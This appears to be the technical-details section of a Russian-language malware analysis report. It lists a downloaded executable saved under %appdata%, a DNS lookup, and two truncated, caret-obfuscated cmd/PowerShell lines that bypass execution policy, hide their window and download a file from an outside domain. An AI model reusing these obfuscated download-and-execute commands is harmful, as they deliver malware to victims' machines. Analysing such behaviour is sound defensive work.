Техническая информация
- https://nevolakro.co/corpo.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^We^rS^hE^L^l.Ex^E^ -eX^e^C^uT^iO^NPoliC^Y^ By^pAss ^-NoPrO^F^ILE^ -^WInD^oWST^yl^E ^HIDDe^n^ (nEw^-OB^j^ect S^yst^E^M.^neT.^We^bCLIen^t).Do^wN^L^OaD^Fil^E^('https://nev...
- DNS ASK ne###akro.co
- '<SYSTEM32>\cmd.exe' /c "p^o^We^rS^hE^L^l.Ex^E^ -eX^e^C^uT^iO^NPoliC^Y^ By^pAss ^-NoPrO^F^ILE^ -^WInD^oWST^yl^E ^HIDDe^n^ (nEw^-OB^j^ect S^yst^E^M.^neT.^We^bCLIen^t).Do^wN^L^OaD^Fil^E^('https://nev... (со скрытым окном)